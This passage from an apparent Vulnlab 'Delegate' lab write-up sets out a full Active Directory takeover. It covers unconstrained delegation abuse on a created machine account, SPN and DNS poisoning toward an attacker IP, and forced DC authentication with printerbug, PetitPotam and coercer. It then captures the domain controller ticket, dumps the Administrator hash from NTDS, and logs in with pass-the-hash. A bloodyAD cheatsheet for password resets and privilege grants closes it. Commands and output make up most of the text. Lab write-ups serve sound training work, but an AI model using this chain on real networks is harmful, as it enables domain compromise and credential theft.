[-] ['TRUSTED_FOR_DELEGATION'] property flags added to obake$'s userAccountControl

Double check:

$ impacket-findDelegation 'delegate.vl'/'obake$:Azerty123!'   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

AccountName  AccountType  DelegationType  DelegationRightsTo  SPN Exists 
-----------  -----------  --------------  ------------------  ----------
obake$      Computer     Unconstrained   N/A                 Yes
  1. add a new SPN to the machine account:

Appending SPN with krbrelayx - addspn.py:

$ git clone https://github.com/dirkjanm/krbrelayx.git
  • HTTP SPN:
$ python3 krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/obake.delegate.vl' -t 'obake$' DC1.delegate.vl      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
  • Or CIFS SPN:
$ python3 krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/obake.delegate.vl' -t 'obake$' DC1.delegate.vl     
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Double check:

$ python3 krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -q -t 'obake$' DC1.delegate.vl                         
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=obake,CN=Computers,DC=delegate,DC=vl - STATUS: Read - READ TIME: 2025-01-26T21:38:26.227003
    dNSHostName: obake.delegate.vl
    sAMAccountName: obake$
    servicePrincipalName: HTTP/obake.delegate.vl
                          RestrictedKrbHost/obake.delegate.vl
                          RestrictedKrbHost/obake
                          HOST/obake.delegate.vl
                          HOST/obake

Good as HTTP/obake.delegate.vl has been added

  1. Add a DNS entry to the DC DNS which points this SPN to our attacker machine using krbrelayx - dnstool.py:
$ python3 krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r obake.delegate.vl -d 10.8.4.253 --action add -dns-ip 10.10.120.223 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Double check:

$ python3 krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r obake.delegate.vl -d 10.8.4.253 --zone delegate.vl -dns-ip 10.10.120.223 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record obake
DC=obake,DC=Delegate.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=delegate,DC=vl
[+] Record entry:
 - Type: 1 (A) (Serial: 251)
 - Address: 10.8.4.253
  1. Get the NTLM Hash for the new machine account password:
$ iconv -f ASCII -t UTF-16LE <(printf 'Azerty123!') | openssl dgst -md4
MD4(stdin)= ab56e43a90223bfc35cf2851183ef3a9

Or with Python:

$ python3
>>> import hashlib
>>> print(hashlib.new('md4', 'Azerty123!'.encode('utf-16le')).hexdigest())
ab56e43a90223bfc35cf2851183ef3a9
  1. Start a krbrelayx listener:
Warning
  • For this machine, we need to use the option --target dc1.delegate.vl else we can’t get the DC1$ ticket.
  • with the machine account hash:
$ python3 krbrelayx/krbrelayx.py -hashes :ab56e43a90223bfc35cf2851183ef3a9 --target dc1.delegate.vl                                       
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
  • Or with kerberos user and password:
$ python3 krbrelayx/krbrelayx.py --krbsalt 'DELEGATE\obake$' --krbpass 'Azerty123!' --target dc1.delegate.vl
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
  1. Trigger a kerberos authentication from the DC machine account to our target (coercing authentication with printerbug, but we can also use petipotam, dfscoerce …):
$ python3 krbrelayx/printerbug.py delegate.vl/'obake2$':'Azerty123!'@dc1.delegate.vl obake2.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
$ python3 ./PetitPotam.py -u 'obake2$' -p 'Azerty123!' obake2.delegate.vl 10.10.98.153

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.98.153[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
$ pipx install coercer 
  installed package coercer 2.4.3, installed using Python 3.12.8
  These apps are now globally available
    - coercer
done! ✨ 🌟 ✨
$ pipx ensurepath
$ coercer coerce -u 'obake2$' -p 'Azerty123!' -d delegate.vl -l obake.delegate.vl -t dc1.delegate.vl --always-continue
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target dc1.delegate.vl
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49669,49670,49674,50543,50576,49681,49689
[+] DCERPC port '49674' is accessible!
   [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\obake.delegate.vl\x00') 
      [>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\obake.delegate.vl\x00') 
  1. Get the DC1$ ticket in krbrelayx’s output:
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.98.153
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Inject the ticket to our global environement variable:

$ export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache 
$ klist
Ticket cache: FILE:DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
01/27/2025 15:46:38  01/27/2025 23:13:48  krbtgt/DELEGATE.VL@DELEGATE.VL
	renew until 02/03/2025 13:13:48

Use it to grab the Administrator’s hash:

$ nxc smb DC1.delegate.vl --use-kcache --kdcHost DC1.delegate.vl --ntds --user Administrator                      
SMB         DC1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         DC1.delegate.vl 445    DC1              [+] delegate.vl\DC1$ from ccache 
SMB         DC1.delegate.vl 445    DC1              [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         DC1.delegate.vl 445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         DC1.delegate.vl 445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::

Finally we got the flag Delegate_Root:

$ nxc winrm DC1.delegate.vl -u Administrator -H 'c32198ceab4cc695e65045562aa3ee93' -X 'type c:\users\administrator\desktop\root.txt'
WINRM       10.10.98.153    5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
WINRM       10.10.98.153    5985   DC1              [+] delegate.vl\Administrator:c32198ceab4cc695e65045562aa3ee93 (Pwn3d!)
WINRM       10.10.98.153    5985   DC1              [+] Executed command (shell type: powershell)
WINRM       10.10.98.153    5985   DC1              VL{1205f239c3aaaf1e6f7ac423a1fb3c16}

Way 2 - Hybrid mode on the target & our attacker machine

Import and use Powermad on the target:

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> cd c:\windows\tasks
*Evil-WinRM* PS C:\windows\tasks> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\windows\tasks> New-MachineAccount -MachineAccount obake -Password $(ConvertTo-SecureString 'Azerty123!' -AsPlainText -Force)
[+] Machine account obake added

*Evil-WinRM* PS C:\windows\tasks> Set-MachineAccountAttribute -MachineAccount obake -Attribute useraccountcontrol -Value 528384
[+] Machine account obake attribute useraccountcontrol updated

*Evil-WinRM* PS C:\windows\tasks> Set-MachineAccountAttribute -MachineAccount obake -Attribute ServicePrincipalName -Value HTTP/obake.delegate.vl -Append
[+] Machine account obake attribute ServicePrincipalName appended

Then switch to our attacker machine:

$ python3 krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r obake.delegate.vl -d 10.8.4.253 --action add -dns-ip 10.10.120.223 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

$ python3 krbrelayx/krbrelayx.py -hashes :ab56e43a90223bfc35cf2851183ef3a9 --target dc1.delegate.vl
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in attack mode to single host
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

$ python3 krbrelayx/printerbug.py delegate.vl/'obake$':'Azerty123!'@dc1.delegate.vl obake.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Then we got the DC1$ ticket in krbrelayx’s output:

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.120.223
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Last steps are the same than above Way 1.

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=cd1cb817-d176-4f65-aa25-4b1b63357b5f

F7c6Z_MXoAAuwWB

BloodyAD

All command references can be found here: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Cheatsheet:

  • Retrieve User Information
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
  • Add User To Group
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
  • Change Password
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
  • Give User GenericAll Rights
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
  • WriteOwner
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
  • ReadGMSAPassword
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
  • Enable a Disabled Account
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
  • Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION